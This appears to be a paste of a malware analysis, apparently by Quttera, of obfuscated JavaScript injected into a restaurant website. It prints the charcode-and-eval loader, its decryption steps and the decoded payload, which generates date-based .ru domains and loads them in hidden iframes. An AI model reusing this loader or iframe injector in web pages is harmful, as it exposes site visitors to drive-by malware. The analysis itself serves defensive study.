SHOW:
|
|
- or go back to the newest paste.
| 1 | /****************************** | |
| 2 | * Quttera Web Malware monitor detected malicious JavaScript code | |
| 3 | * that use multiple levels of obfuscation. Decoded payload generates | |
| 4 | * hidden iframes to random websites located under *.ru | |
| 5 | * | |
| 6 | * Full report could be found here: http://quttera.com/detailed_report/www.ristoranteada.eu | |
| 7 | * | |
| 8 | * The initial threat code | |
| 9 | ******************************/ | |
| 10 | var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
| |
| 11 | document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
| |
| 12 | window.eval(String.fromCharCode(105, 61, 48, 59, 116, 114, 121, 123, 112, 114, 111, 116, 111, 116, 121, 112, 101, 45, 53, 59, 125, 99, 97, 116, 99, 104, 40, 122, 41, 123, 102, 61, 91, 49, 48, 50, 44, ... 116, 114, 121, 123, 113, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 98, 34, 41, 59, 105, 102, 40, 101, 41, 113, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 113, 43, 34, 34, 41, 59, 125, 99, 97, 116, 99, 104, 40, 102, 119, 98, 101, 119, 101, 41, 123, 119, 61, 102, 59, 115, 61, 91, 93, 59, 125, 13, 10, 114, 61, 83, 116, 114, 105, 110, 103, 59, 122, 61, 40, 40, 101, 41, 63, 34, 67, 111, 100, 101, 34, 58, 34, 34, 41, 59, 102, 111, 114, 40, 59, 49, 51, 51, 51, 45, 53, 43, 53, 62, 105, 59, 105, 43, 61, 49, 41, 123, 106, 61, 105, 59, 105, 102, 40, 101, 41, 115, 61, 115, 43, 114, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 40, 119, 91, 106, 93, 47, 40, 50, 45, 49, 43, 106, 37, 50, 41, 41, 41, 59, 125, 13, 10, 105, 102, 40, 102, 41, 101, 40, 115, 41, 59)); | |
| 13 | ||
| 14 | /******************************************************* | |
| 15 | * First level of decryption | |
| 16 | - | ******************************************************* |
| 16 | + | *******************************************************/ |
| 17 | i = 0; | |
| 18 | try {
| |
| 19 | prototype - 5; | |
| 20 | } catch (z) {
| |
| 21 | f = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 220, 100, 222, 109, ... 210, 108, 200, 40, 210, 102, 228, 109, 82, 125, 250, 99, 194, 116, 198, 104, 80, 101, 82, 123, 250, 125, 88, 53, 96, 48, 82, 59]; | |
| 22 | v = "e" + "v" + "a"; | |
| 23 | } | |
| 24 | if (v) e = window[v + "l"]; | |
| 25 | try {
| |
| 26 | q = document.createElement("b");
| |
| 27 | if (e) q.appendChild(q + ""); | |
| 28 | } catch (fwbewe) {
| |
| 29 | w = f; | |
| 30 | s = []; | |
| 31 | } | |
| 32 | ||
| 33 | r = String; | |
| 34 | z = ((e) ? "Code" : ""); | |
| 35 | for (; 1333 - 5 + 5 > i; i += 1) {
| |
| 36 | j = i; | |
| 37 | if (e) s = s + r.fromCharCode((w[j] / (2 - 1 + j % 2))); | |
| 38 | } | |
| 39 | if (f) e(s); | |
| 40 | ||
| 41 | /******************************************************************* | |
| 42 | * simplified version of this threat | |
| 43 | *******************************************************************/ | |
| 44 | s = ""; | |
| 45 | i = 0; | |
| 46 | f = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 2....]; | |
| 47 | for (; 1333 - 5 + 5 > i; i += 1) { s = s + String.fromCharCode((f[i] / (2 - 1 + i % 2)));}
| |
| 48 | eval(s); | |
| 49 | ||
| 50 | ||
| 51 | /********************************************************************* | |
| 52 | * Decoded payload generates hidden iframes to random domains in *.ru | |
| 53 | * http://<random-domain-name>.ru/runforestrun?sid=cx | |
| 54 | ******************************************************************/ | |
| 55 | function nextRandomNumber() {
| |
| 56 | var hi = this.seed / this.Q; | |
| 57 | var lo = this.seed % this.Q; | |
| 58 | var test = this.A * lo - this.R * hi; | |
| 59 | if (test > 0) {
| |
| 60 | this.seed = test | |
| 61 | } else {
| |
| 62 | this.seed = test + this.M | |
| 63 | } | |
| 64 | return (this.seed * this.oneOverM) | |
| 65 | } | |
| 66 | function RandomNumberGenerator(unix) {
| |
| 67 | var d = new Date(unix * 1000); | |
| 68 | var s = d.getHours() > 12 ? 1 : 0; | |
| 69 | this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF)); | |
| 70 | this.A = 48271; | |
| 71 | this.M = 2147483647; | |
| 72 | this.Q = this.M / this.A; | |
| 73 | this.R = this.M % this.A; | |
| 74 | this.oneOverM = 1.0 / this.M; | |
| 75 | this.next = nextRandomNumber; | |
| 76 | return this | |
| 77 | } | |
| 78 | function createRandomNumber(r, Min, Max) {
| |
| 79 | return Math.round((Max - Min) * r.next() + Min) | |
| 80 | } | |
| 81 | function generatePseudoRandomString(unix, length, zone) {
| |
| 82 | var rand = new RandomNumberGenerator(unix); | |
| 83 | var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']; | |
| 84 | var str = ''; | |
| 85 | for (var i = 0; i < length; i++) {
| |
| 86 | str += letters[createRandomNumber(rand, 0, letters.length - 1)] | |
| 87 | } | |
| 88 | return str + '.' + zone | |
| 89 | } | |
| 90 | setTimeout(function () {
| |
| 91 | try {
| |
| 92 | if (typeof iframeWasCreated2 == "undefined") {
| |
| 93 | iframeWasCreated2 = true; | |
| 94 | var unix = Math.round(+new Date() / 1000); | |
| 95 | var domainName = generatePseudoRandomString(unix, 16, 'ru'); | |
| 96 | ifrm = document.createElement("IFRAME");
| |
| 97 | ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");
| |
| 98 | ifrm.style.width = "0px"; | |
| 99 | ifrm.style.height = "0px"; | |
| 100 | ifrm.style.visibility = "hidden"; | |
| 101 | document.body.appendChild(ifrm) | |
| 102 | } | |
| 103 | } catch (e) {}
| |
| 104 | }, 500); |
